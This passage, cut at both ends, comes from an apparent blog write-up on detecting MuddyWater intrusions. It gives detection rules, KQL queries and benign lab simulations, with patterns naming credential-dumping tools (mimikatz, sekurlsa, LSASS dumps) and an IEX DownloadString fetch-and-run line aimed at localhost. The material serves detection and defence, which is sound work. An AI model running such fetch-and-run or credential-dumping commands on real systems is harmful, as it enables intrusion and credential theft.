narrow — it will miss if MuddyWater switches from Telegram to another messaging API, but fires with high precision on the documented Small Sieve C2 channel.</p><p>Score is 3 because VirtualBox NAT blocked outbound Telegram connections in the lab, preventing full Kibana validation of the network connection event.</p><p><strong>Required telemetry:</strong> DNS query logs or network flow logs with process name attribution. In environments without process-attributed network telemetry, this degrades to a domain-based alert with no process context.</p><pre>event_type = network_connection AND<br>destination_domain = "api.telegram.org" AND<br>destination_port = 443 AND<br>source_process NOT IN ["Telegram.exe","telegram.exe","chrome.exe",<br>                        "firefox.exe","msedge.exe","iexplore.exe"]</pre><p><strong>Key false positives:</strong> Telegram desktop application where it is approved. Bot developers testing scripts from dev workstations. In organizations where Telegram is standard, strict process allowlisting is required before this detection is useful.</p><h4>det_mw_0008b — DNS Tunneling Volume and Entropy</h4><p><em>Techniques: T1572 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Mori, MuddyWater’s DNS-tunneling backdoor, uses DNS queries as the C2 channel. DNS tunneling encodes data in subdomain labels, producing distinctive patterns: high query volume to a single domain, unusually long subdomain strings, and high Shannon entropy in the label content.</p><p><strong>Why it’s built this way:</strong> DNS tunneling detection cannot rely on a single heuristic because each heuristic has a different failure mode. Volume (Rule A) catches high-throughput tunneling but misses slow/low-rate tools that deliberately throttle to blend in. Label length (Rule B) catches encoded payloads regardless of rate or entropy but misses short encoded segments. Entropy (Rule C) catches random-looking subdomains at any length and rate but produces noise on CDN hash labels without a comprehensive baseline. The three rules are additive — any single trigger warrants investigation, two or more from the same source are high-confidence.</p><p>The thresholds (&gt;100 queries per 60 seconds, &gt;40-character labels, &gt;3.5 Shannon entropy) were validated in the lab by generating 180 DNS queries with 42-character random subdomains from the simulation playbook.</p><p><strong>Required telemetry:</strong> DNS resolver logs with full QNAME — not available in all environments. If only DNS flow logs (not query content) are available, Rule B and Rule C are unavailable.</p><pre># Rule A — High query volume to single parent domain<br>event_type = dns_query<br>GROUP BY source_ip, query_domain_parent<br>HAVING COUNT(*) &gt; 100 WITHIN 60 seconds<br><br># Rule B - Long subdomain labels (&gt;40 chars indicates encoded payload)<br>event_type = dns_query AND<br>LENGTH(subdomain_label) &gt; 40<br># Rule C - High entropy subdomains (random-looking encoded content)<br>event_type = dns_query AND<br>SHANNON_ENTROPY(subdomain_label) &gt; 3.5 AND<br>subdomain_label NOT IN [known_cdn_domains_baseline]</pre><p><strong>Key false positives:</strong> CDN domains using hash-based subdomains (Akamai, Cloudflare, AWS) — require comprehensive allowlist for Rule C. DNSSEC validation traffic with long encoded keys. Calibrate thresholds against your specific environment’s DNS baseline before deploying Rule A in production.</p><h4>det_mw_0009 — WMI SecurityCenter2 Discovery Survey</h4><p><em>Techniques: T1047, T1082, T1016, T1033, T1518.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> CISA AA22–055A reproduces the exact PowerShell survey script MuddyWater uses post-access: a WMI query chain that collects IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username (Win32_ComputerSystem), and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2.</p><p><strong>Why it’s built this way:</strong> The detection anchors on SecurityCenter2\AntiVirusProduct because it is the highest-specificity WMI class in the documented survey. The other classes — OS name, IP addresses, hostname — are queried by dozens of legitimate monitoring tools. AntiVirusProduct enumeration has a much smaller legitimate caller population: primarily AV management consoles and endpoint security platforms. This makes it the most reliable low-noise signal from the full survey chain.</p><p>Three rules are layered by telemetry quality. Rule A requires Script Block Logging (highest fidelity, decoded script content visible). Rule B falls back to command-line logging — medium fidelity, only fires if SecurityCenter2 appears in the literal command line, not in a decoded payload. Rule C is the most specific: a multi-class pattern that matches the complete documented survey chain, covering all five ATT&amp;CK techniques in a single event. T1033 coverage was added to Rule C via Win32_ComputerSystem during the analyst review pass — it was missing from the initial draft.</p><p>Rule C matches the CISA-documented script closely enough to be treated as near-exact-match when observed.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rules A and C. Sysmon Event ID 1 for Rule B.</p><pre># Rule A — Script Block captures SecurityCenter2 query<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "AntiVirusProduct"<br><br># Rule B - Process command line contains SecurityCenter2 (fallback without SBL)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line MATCHES "SecurityCenter2"<br># Rule C - Full survey pattern: all 5 ATT&amp;CK techniques in one event<br># T1518.001 (AV enum) + T1016 (network config) + T1082 (OS info) + T1033 (username)<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "Win32_NetworkAdapterConfiguration" AND<br>script_block_text MATCHES "Win32_OperatingSystem" AND<br>script_block_text MATCHES "(Win32_ComputerSystem|Win32_UserAccount|UserName)"</pre><p><strong>Key false positives:</strong> AV management software and endpoint security platforms querying SecurityCenter2. IT inventory tools (Lansweeper, SCCM hardware inventory). Exclude by process hash or signer rather than by process name, since attackers can rename their scripts.</p><h4>det_mw_0010 — LSASS Memory Access and Credential Tool Execution</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*J0Q8ExDAG7jBY7duoI35MA.png"></figure><p><em>Techniques: T1003.001, T1003.004, T1003.005 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater performs credential access using three tools documented in CISA AA22–055A: Mimikatz and procdump64.exe against LSASS memory (T1003.001), and LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005).</p><p><strong>Why it’s built this way:</strong> Three independent rules cover the full credential dumping lifecycle, each with a different detection philosophy.</p><p>Rule A is the design priority: a process accessing LSASS memory is the universal pre-condition for any LSASS dump, regardless of tool. Detecting the access event (Sysmon EID 10) rather than the tool name means Rule A fires on Mimikatz, procdump, custom C++ loaders, and any future variant — as long as the access mask is in the covered set. The access masks were sourced from established Mimikatz research (0x1010, 0x1410, 0x1438, 0x143a, 0x1418) and extended with 0x1fffff (PROCESS_ALL_ACCESS, used by custom dumpers) and 0x1f0fff (another all-access variant observed in the field). The exclusion list covers known legitimate callers — AV engines, CSrss, WinInit — without which this rule generates constant noise from endpoint security products.</p><p>Rule B is the name-based backstop. Lower fidelity because it misses renamed tools, but catches actors using stock Mimikatz. The analyst review pass re-bracketed the command_line clause to keep it inside the event_type guard — a real operator precedence bug that would have caused the command-line check to match events outside the process_create filter.</p><p>Rule C catches the dump artifact on disk — a final fallback when process-level events are unavailable. .dmp files in user-writable paths are anomalous outside of Windows Error Reporting, which writes to a fixed known path.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 10 (ProcessAccess) with explicit lsass.exe targeting in the Sysmon configuration — this is not enabled by default. Without it, Rule A does not exist. Sysmon Event ID 1 for Rule B. Sysmon Event ID 11 for Rule C.</p><pre># Rule A — LSASS process access (tool-agnostic, highest confidence)<br>event_type = process_access AND<br>target_image ENDSWITH "lsass.exe" AND<br>granted_access MATCHES "(0x1010|0x1410|0x1438|0x143a|0x1418|0x1fffff|0x1f0fff)" AND<br>source_image NOT IN ["MsMpEng.exe","csrss.exe","wininit.exe","svchost.exe",<br>                     "SecurityHealthService.exe","CylanceSvc.exe","SentinelAgent.exe"]<br><br># Rule B - Known credential tool execution (name-based backstop)<br># command_line clause is bracketed inside event_type guard (bug fix in review)<br>event_type = process_create AND<br>(image IMATCHES "mimikatz\.exe" OR<br> image ENDSWITH "procdump64.exe" OR<br> image IMATCHES "lazagne\.exe" OR<br> command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)")<br># Rule C - Dump file creation in user-writable path (artifact backstop)<br>event_type = file_create AND<br>file_extension = "dmp" AND<br>file_path MATCHES "(\\AppData\\|\\Temp\\|\\Users\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> AV and EDR agents that legitimately access LSASS — exclude by process hash, not name, since names are spoofable. Windows Error Reporting creating .dmp files in %TEMP%\WER — exclude that specific path in Rule C. Legitimate procdump usage by developers for application crash diagnostics — require a separate approved-tools baseline.</p><p><strong>Important environment note:</strong> Credential Guard and PPL (Protected Process Light) prevent LSASS reads on modern, hardened systems. If your environment has these enabled, LSASS dump detection is still valuable as a canary for misconfigured or unpatched endpoints, but confirm protection status before using coverage scores here as a measure of actual protection.</p><h3>Phase 5: Validation Lab</h3><h4>Architecture</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8U-N2gM0mGw6qRI7SG06dw.png"></figure><h4>Deploy in One Command</h4><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env   # fill in passwords<br>bash start.sh</pre><p>start.sh creates the Docker network, starts all stack services, waits for Elasticsearch, boots the Windows 10 Vagrant VM, provisions it via Ansible (Sysmon + Script Block Logging + Winlogbeat), and runs all 11 simulations.</p><h4>Simulation Design</h4><p>Every simulation is <strong>benign-by-design</strong>:</p><ul><li>No live malware, no real C2, no credential exfiltration</li><li>Simulations write benign files (VBScript with Write-Host payload), run real Windows binaries with harmless arguments, or use .NET to open process handles with minimal access masks</li><li>All .dmp files are deleted immediately after event confirmation</li><li>The VM does not connect to real Telegram infrastructure</li></ul><p>The Ansible playbook (lab/ansible/playbooks/validate.yml) runs each simulation, waits 3 seconds, queries the Windows Event Log with Get-WinEvent -FilterHashtable (time-bounded to the last 60 seconds), and prints PASS / FAIL.</p><h4>Step 21: det_mw_0001 — Spearphishing Delivery Chain</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8bLoGgU_easNlOr4ZndCgg.png"></figure><p><strong>What MuddyWater does:</strong> Delivers a ZIP or Office file via email or Egnyte/OneDrive link. The attachment contains a VBScript or WSF file that spawns a hidden encoded PowerShell loader (PowGoop/POWERSTATS).</p><p><strong>Simulation:</strong> wscript.exe sim_delivery.vbs → powershell.exe -WindowStyle Hidden -NonInteractive -EncodedCommand &lt;Base64&gt;</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *powershell.exe*<br>AND winlog.event_data.CommandLine: *EncodedCommand*</pre><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → powershell.exe -EncodedCommand. Parent-child chain and Base64 command line both visible in Kibana.</p><h4>Step 22: det_mw_0002 — Web Service Shell Spawn</h4><p><strong>What MuddyWater does:</strong> Exploits Exchange (CVE-2020–0688), IIS, or Log4j (CVE-2021–44228) — web-facing service spawns cmd.exe or powershell.exe for post-exploitation recon.</p><p><strong>Simulation:</strong> wscript.exe sim_exploit.vbs → cmd.exe /c whoami &amp; hostname &amp; ipconfig /all</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *cmd.exe*<br>AND winlog.event_data.CommandLine: (*whoami* OR *hostname* OR *ipconfig*)</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PdbeaS4qAhZO0Abz1vnxlw.png"></figure><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → cmd.exe with recon commands in CommandLine.</p><h4>Step 23: det_mw_0003 — PowerShell Encoded Command</h4><p><strong>What MuddyWater does:</strong> PowGoop uses -EncodedCommand for C2 setup. POWERSTATS uses IEX + (New-Object Net.WebClient).DownloadString(...) for stager execution.</p><p><strong>Rule A simulation:</strong> powershell.exe -NonInteractive -e &lt;Base64(Write-Host "test")&gt;</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.CommandLine: *-e*<br>AND winlog.event_data.CommandLine: *[A-Za-z0-9+/]{40,}*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-a6QvN0QQMAwrYTgedLgw.png"></figure><p><strong>Rule A Result: PASS</strong> — 4 events captured. PowerShell with Base64 blob visible in command line.</p><p><strong>Rule B simulation:</strong> IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/...'))</p><p><strong>KQL — Rule B:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *IEX*<br>AND winlog.event_data.ScriptBlockText: *DownloadString*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-VDCsOq78LyTENKxOUQjJg.png"></figure><p><strong>Rule B Result: PASS</strong> — 16 EID 4104 events. Script Block Logging decoded the IEX + DownloadString pattern.</p><blockquote><strong><em>Capability gate:</em></strong><em> Script Block Logging (EID 4104) must be explicitly enabled. Without it, Rule B is unavailable and detection degrades to command-line heuristics only.</em></blockquote><h4>Step 24: det_mw_0004 — DLL Side-Loading</h4><p><strong>What MuddyWater does:</strong> PowGoop drops Goopdate.dll alongside a copy of GoogleUpdate.exe outside the legitimate Google installation path. When GoogleUpdate launches, Windows loads the malicious DLL.</p><p><strong>Simulation:</strong> Copy a benign 4-byte MZ stub as goopdate.dll into a test directory alongside a signed binary. Launch the binary.</p><p><strong>Result: PARTIAL</strong> — Sysmon EID 7 (ImageLoad) did not fire. Root cause: a 4-byte MZ stub is not a valid loadable DLL — the Windows loader rejects it before generating an EID 7 event. The Sysmon config and detection rule are correct. <strong>Resolution:</strong> Re-test with a real GoogleUpdate.exe (requires Google Chrome installed on lab VM).</p><h4>Step 25: det_mw_0005 — Registry Run Key Persistence</h4><p><strong>What MuddyWater does:</strong> Small Sieve writes OutlookMicrosift to HKCU\...\CurrentVersion\Run — a deliberate typo designed to look like a Microsoft entry. Canopy drops a .wsf file to the Startup folder.</p><p><strong>Rule A simulation:</strong> Write OutlookMicrosift = notepad.exe to HKCU\...\Run</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 13<br>AND winlog.event_data.TargetObject: *CurrentVersion\Run\OutlookMicrosift*</pre><p><strong>Rule A Result: PASS</strong> — 3 Sysmon EID 13 events. OutlookMicrosift Run key captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RTAU8BoEU41ydMrali20PA.png"></figure><p><strong>Rule C simulation:</strong> Copy a benign .wsf file to %APPDATA%\...\Start Menu\Programs\Startup\</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *\Startup\*<br>AND winlog.event_data.TargetFilename: *.wsf*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C6VaYiU1W6t9P7VM9Uyq6Q.png"></figure><p><strong>Rule C Result: PASS</strong> — 3 Sysmon EID 11 events. WSF file creation in Startup folder captured.</p><h4>Step 26: det_mw_0006 — Scheduled Task (43-Minute Beacon)</h4><p><strong>What MuddyWater does:</strong> BugSleep creates a scheduled task triggered every <strong>43 minutes</strong>. This interval is a BugSleep artifact — not a default, not a round number. It appears in INCD 2024 reporting and is one of the most precise technical IoCs in the dataset.</p><p><strong>Simulation:</strong> schtasks.exe /create /tn DH-SIM-0006-TestTask /tr notepad.exe /sc MINUTE /mo 43 /f</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\schtasks.exe*<br>AND winlog.event_data.CommandLine: */mo 43*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a6plhGCKeJFpgCePxizDA.png"></figure><p><strong>Result: PASS</strong> — 3 Sysmon EID 1 events. schtasks.exe /mo 43 captured. The 43-minute interval in the command line is the exact BugSleep artifact.</p><blockquote><strong><em>Hunt value:</em></strong><em> </em><em>PT43M in Task Scheduler Operational logs is a retroactive hunt trigger. One match = investigate immediately. No legitimate software uses this exact interval.</em></blockquote><h4>Step 27: det_mw_0007 — RMM Tool Abuse</h4><p><strong>What MuddyWater does:</strong> Delivers a legitimate RMM binary (ScreenConnect, SimpleHelp, AteraAgent, Level, PDQConnect) via phishing email or file-sharing link. The binary is placed in AppData, Temp, or Downloads — not installed by an IT management system. This is documented in all five government source tiers.</p><p><strong>Simulation:</strong> Copy ScreenConnect.ClientService.exe to C:\Temp\dh-lab\ and launch it.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\Temp\ScreenConnect*</pre><p><strong>Result: PASS</strong> — 6 Sysmon EID 1 events. RMM binary executing from \Temp\ captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U9wgP3tZtCZYaEGIct6woQ.png"></figure><blockquote><strong><em>Production requirement:</em></strong><em> This detection requires a baseline of authorized RMM deployments per endpoint. Without the baseline, it generates noise. With it, any out-of-baseline RMM execution is an immediate high-confidence alert.</em></blockquote><h4>Step 28: det_mw_0008a — Telegram Bot API C2</h4><p><strong>What MuddyWater does:</strong> Small Sieve uses the Telegram Bot API (api.telegram.org:443) for C2 over HTTPS. In an enterprise environment where Telegram is not standard software, any non-browser process connecting to this domain is anomalous.</p><p><strong>Simulation:</strong> powershell.exe makes an HTTP request to https://api.telegram.org/botTEST/getMe (invalid token — 401 response; the connection attempt is the evidence).</p><p><strong>Result: FAIL</strong> — Sysmon EID 3 (NetworkConnect) did not fire. Root cause: VirtualBox NAT prevents Sysmon from capturing the outbound network connection to api.telegram.org in the lab environment. The Sysmon rule config is correct. <strong>Resolution:</strong> Re-test with a host-only NIC that provides direct internet access.</p><h4>Step 29: det_mw_0008b — DNS Tunneling</h4><p><strong>What MuddyWater does:</strong> Mori uses DNS tunneling for C2. High-volume queries with long, high-entropy subdomain labels are the telemetry signature.</p><p><strong>Simulation:</strong> 60 Resolve-DnsName queries with 42-character random labels against *.test.internal.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 22<br>AND winlog.event_data.QueryName: *.test.internal*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yt5HdYyG3lGJi-pY88VPXA.png"></figure><p><strong>Result: PASS</strong> — 180 Sysmon EID 22 events captured. 42-character random labels visible in QueryName field. Volume threshold (Rule A) and label-length threshold (Rule B) would both trigger in a production deployment.</p><h4>Step 30: det_mw_0009 — WMI SecurityCenter2 Discovery</h4><p><strong>What MuddyWater does:</strong> CISA AA22–055A documents a post-access survey script that queries root\SecurityCenter2\AntiVirusProduct via WMI — enumerating the installed AV product before deciding how to proceed. This is also combined with OS info, network config, and user queries in a single script.</p><p><strong>Simulation (Rule A):</strong> Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *SecurityCenter2*</pre><p><strong>Rule A Result: PASS</strong> — 21 PS EID 4104 events. SecurityCenter2 visible in decoded ScriptBlockText.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wpLAuTyJkLgoqezMzJWISA.png"></figure><blockquote><strong><em>Detection value:</em></strong><em> SecurityCenter2 + AntiVirusProduct is one of the highest-specificity behavioral signals in this dataset. Its legitimate caller population is tiny: only AV management consoles and a few inventory tools query this namespace. A PowerShell process making this query outside those exceptions warrants immediate investigation.</em></blockquote><h4>Step 31: det_mw_0010 — LSASS Memory Access</h4><p><strong>What MuddyWater does:</strong> Uses Mimikatz, procdump64.exe, and LaZagne to dump LSASS memory and extract credentials. CISA AA22–055A names all three tools.</p><p><strong>Rule A simulation:</strong> .NET OpenProcess(PROCESS_QUERY_INFORMATION, lsass.pid) — opens a handle to lsass.exe with a minimal access mask, triggering Sysmon EID 10.</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 10<br>AND winlog.event_data.TargetImage: *lsass.exe*<br>AND winlog.event_data.GrantedAccess: 0x1400</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G-oMtjgeEzuCIKfTDznKzA.png"></figure><p><strong>Rule A Result: PASS</strong> — 3,398 Sysmon EID 10 events with GrantedAccess: 0x1400 and TargetImage: lsass.exe. The high event count is expected — LSASS receives many legitimate handle requests from AV, EDR, and Windows system processes. Production deployment requires an allowlist of known-good callers.</p><p><strong>Rule C simulation:</strong> Write a 4-byte MDMP header as lsass_test.dmp to C:\Temp\dh-lab\ — triggers Sysmon EID 11.</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *.dmp*<br>AND winlog.event_data.TargetFilename: *Temp*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TrCWgKcujqKdBRCX-OG26w.png"></figure><p><strong>Rule C Result: PASS</strong> — 6 Sysmon EID 11 events. C:\Temp\dh-lab\lsass_test.dmp creation captured.</p><blockquote><strong><em>Lab safety:</em></strong><em> The </em><em>.dmp file was deleted immediately after event confirmation. No credential material exists in the file — it was a 4-byte header stub. No real LSASS dump was performed.</em></blockquote><h3>Phase 5 Validation Results Summary</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yl6Y0h2_ePVKH3i8einFDQ.png"></figure><p>Full run: ansible-playbook playbooks/validate.yml — <strong>ok=70 changed=42 failed=0</strong></p><ul><li>Step 21 — <strong>det_mw_0001</strong> · Process spawn → <strong>PASS</strong></li><li>Step 22 — <strong>det_mw_0002</strong> · Shell from service → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule A (-e + Base64) → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule B (IEX + DownloadString) → <strong>PASS</strong></li><li>Step 24 — <strong>det_mw_0004</strong> · EID 7 ImageLoad → <strong>PARTIAL</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule A (OutlookMicrosift) → <strong>PASS</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule C (WSF in Startup) → <strong>PASS</strong></li><li>Step 26 — <strong>det_mw_0006</strong> · schtasks /mo 43 → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule A (RMM from \Temp) → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule B (RMM from PS parent) → <strong>PASS</strong></li><li>Step 28 — <strong>det_mw_0008a</strong> · EID 3 Telegram → <strong>FAIL</strong></li><li>Step 29 — <strong>det_mw_0008b</strong> · EID 22 DNS tunneling → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule A (SecurityCenter2 EID 4104) → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule B (wmic SecurityCenter2) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule A (LSASS EID 10) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule C (.dmp EID 11) → <strong>PASS</strong></li></ul><p><strong>13 PASS / 1 PARTIAL / 1 FAIL</strong> across 16 rule checks.</p><h3>Phase 6: Coverage Matrix</h3><p>Of 22 ATT&amp;CK techniques documented in the source set:</p><ul><li><strong>15 techniques (68%)</strong> — score 5, fully lab-validated</li><li><strong>2 techniques (9%)</strong> — score 4, correlated and validated via fallback</li><li><strong>4 techniques (18%)</strong> — score 3, rule present but validation incomplete</li><li><strong>7 techniques</strong> — score 0, no detection (Lateral Movement, Collection, Exfiltration, Impact)</li></ul><p><strong>The six capability gates</strong> that determine your effective coverage floor:</p><ul><li><strong>PowerShell Script Block Logging (EID 4104)</strong> — unlocks det_mw_0003 Rule B and det_mw_0009 Rules A/C. Without it: detection degrades to command-line heuristics only.</li><li><strong>Sysmon EID 10 (ProcessAccess)</strong> — unlocks det_mw_0010 Rule A (tool-agnostic LSASS access). Without it: falls back to binary name matching, misses custom dumpers.</li><li><strong>Sysmon EID 7 (ImageLoad)</strong> — unlocks det_mw_0004 (DLL side-loading). Without it: DLL loads are completely invisible.</li><li><strong>DNS resolver logging (full QNAME)</strong> — unlocks det_mw_0008b (DNS tunneling). Without it: Mori C2 channel is invisible.</li><li><strong>Network flow / proxy logs</strong> — unlocks det_mw_0007 Rule C and det_mw_0008a. Without it: RMM and Telegram C2 network-layer coverage lost.</li><li><strong>Email gateway telemetry (SEG)</strong> — unlocks det_mw_0001 full correlated logic. Without it: email-to-endpoint correlation unavailable.</li></ul><h3>What Defenders Should Do Right Now</h3><p><strong>1. Baseline your RMM deployments.</strong> det_mw_0007 is the most consistently documented MuddyWater technique across all five source tiers. It fires on ScreenConnect, SimpleHelp, AteraAgent, Level, and PDQConnect from non-standard paths. But it needs a baseline of authorized deployments first. Build the baseline; the detection logic is already written.</p><p><strong>2. Enable PowerShell Script Block Logging fleet-wide.</strong> One Group Policy change:</p><pre>Computer Configuration → Administrative Templates → Windows Components<br>→ Windows PowerShell → Turn on PowerShell Script Block Logging → Enabled</pre><p>This unlocks det_mw_0003 Rule B and all three det_mw_0009 rules. No other change required.</p><p><strong>3. Configure Sysmon ProcessAccess against lsass.exe.</strong> Without it, LSASS credential dumping detection is binary-name-only. Renamed Mimikatz and custom C++ dumpers are invisible. Add &lt;ProcessAccess onmatch="include"&gt; targeting lsass.exe to sysmon.xml.</p><p><strong>4. Hunt for PT43M now.</strong> Query your Task Scheduler Operational logs for any task with a RepetitionInterval of PT43M. If you find one you didn't create, that is BugSleep. No other legitimate software uses this interval.</p><h3>Reproduce It Yourself</h3><p>The entire project is on GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra"><strong>github.com/anpa1200/operation-desert-hydra</strong></a></p><p>One repository contains everything: Docker Compose stack (OpenCTI + Elasticsearch + Kibana), Vagrant lab VM, Ansible provisioning playbooks, detection rules in four formats (Sigma, KQL, Elastic JSON, SPL), structured intelligence datasets (YAML), and all 12 proof screenshots.</p><p><strong>Deploy:</strong></p><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env<br># fill in ELASTIC_PASSWORD, OPENCTI_ADMIN_PASSWORD, OPENCTI_ADMIN_TOKEN<br>bash start.sh<br># → OpenCTI: http://localhost:8080<br># → Kibana:  http://localhost:5601<br># → all 11 simulations run automatically (~10 min)</pre><p><strong>Stop / destroy:</strong></p><pre>bash stop.sh                # halt VM, keep stack and data<br>bash stop.sh --destroy-vm   # remove VM disk<br>bash stop.sh --destroy-stack  # also stop Docker stack</pre><p><strong>Skip the lab VM</strong> (OpenCTI + Kibana only, no Windows VM):</p><pre>bash start.sh --skip-lab</pre><p>Prerequisites: Docker, VirtualBox, Vagrant, Ansible, Python 3 + pywinrm. Full details in the <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/README.md">README</a>.</p><p>Key files:</p><ul><li>docs/article-step-0-project-scenario.md — full phase-by-phase walkthrough</li><li>data/detections.yaml — all 11 detection records with coverage scores</li><li>lab/ansible/playbooks/validate.yml — the 11 simulation playbook</li><li>detections/sigma/, detections/kql/, detections/elastic/, detections/spl/ — rule exports</li></ul><h3>What This Project Is Not</h3><p>This is not a red team toolkit. The lab produces benign telemetry for detection validation — no live malware, no real C2, no credential theft. The detection pseudologic is SIEM-agnostic and requires production translation and tuning before deployment. Coverage scores are conservative: 5 requires a Kibana screenshot, not just passing logic.</p><p>The source base is entirely public. The actor’s actual TTPs may be more sophisticated than what is documented. Treat the coverage matrix as a floor, not a ceiling.</p><h3>Production Scars</h3><p>Everything above describes what the project looks like after it worked. This section documents what broke, in what order, and what was actually fixed — the kind of detail that gets cut from writeups but is the most useful part for anyone trying to reproduce this.</p><h4>Scar 1: The Simulations Were Faking It</h4><p>The first validation attempt used synthetic event markers. The simulation playbook injected a DH-SIM-0001 string into the CommandLine field, then the Kibana queries looked for that exact string:</p><pre>winlog.event_id: 1 AND winlog.event_data.CommandLine: *DH-SIM-0001*</pre><p>This produces a screenshot. It does not prove a detection works.</p><p>The problem is fundamental: a query that looks for a marker you injected proves that injection works, not that a detection fires on real attacker behavior. If MuddyWater runs wscript.exe and spawns powershell.exe -EncodedCommand, the DH-SIM-0001 query returns nothing. The detection coverage number was meaningless.</p><p><strong>What was fixed:</strong> All simulations were rewritten to produce realistic execution chains — wscript.exe spawning powershell.exe -EncodedCommand &lt;base64&gt;, schtasks.exe /create /sc minute /mo 43, lsass.exe being accessed by a test process with the correct GrantedAccess mask. All KQL queries were rewritten to use real field-based conditions: winlog.event_data.ParentImage, winlog.event_data.GrantedAccess, winlog.event_data.TargetObject, winlog.event_data.ScriptBlockText. Every proof screenshot now shows a real field value, not a synthetic marker.</p><p><strong>The lesson:</strong> A proof screenshot is only as good as the conditions that trigger it. If the simulation writes what the query reads, you have a tautology, not a detection.</p><h4>Scar 2: det_mw_0004 — The DLL That Wouldn’t Load</h4><p>The simulation for det_mw_0004 (DLL side-loading) created a 4-byte MZ-header stub file named Goopdate.dll in a temp directory alongside GoogleUpdate.exe, then waited for Sysmon Event ID 7 (ImageLoad) to fire.</p><p>It never fired.</p><p>Root cause: a 4-byte MZ stub is not a valid PE binary. The Windows loader parses the PE header before loading — the stub fails the loader’s structural validation and is rejected before the load event is generated. Sysmon only generates EID 7 for DLLs that actually get mapped into process memory. A file that fails to load produces no EID 7.</p><p>The Sysmon configuration was correct. The detection rule was correct. The simulation was wrong.</p><p><strong>Result: PARTIAL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> The test needs a real, valid DLL — even an empty DLL compiled from a single DllMain that returns TRUE. Alternatively, installing the actual Google Chrome on the lab VM provides a real Goopdate.dll at the expected path, which could then be copied to a non-standard location. Neither was done in this iteration due to lab scope constraints (no internet access on the VM for Chrome installation, no compiler toolchain in the lab).</p><p><strong>The lesson:</strong> When validating EID 7 detections, your test artifact must be a valid loadable PE. A stub file saves time and produces nothing.</p><h4>Scar 3: det_mw_0008a — VirtualBox NAT Ate the Telegram Traffic</h4><p>The simulation for det_mw_0008a (Telegram Bot API C2) made an outbound HTTPS connection to api.telegram.org from PowerShell and waited for Sysmon Event ID 3 (NetworkConnect) to fire.</p><p>It never fired.</p><p>Root cause: VirtualBox NAT performs network address translation at the hypervisor level. 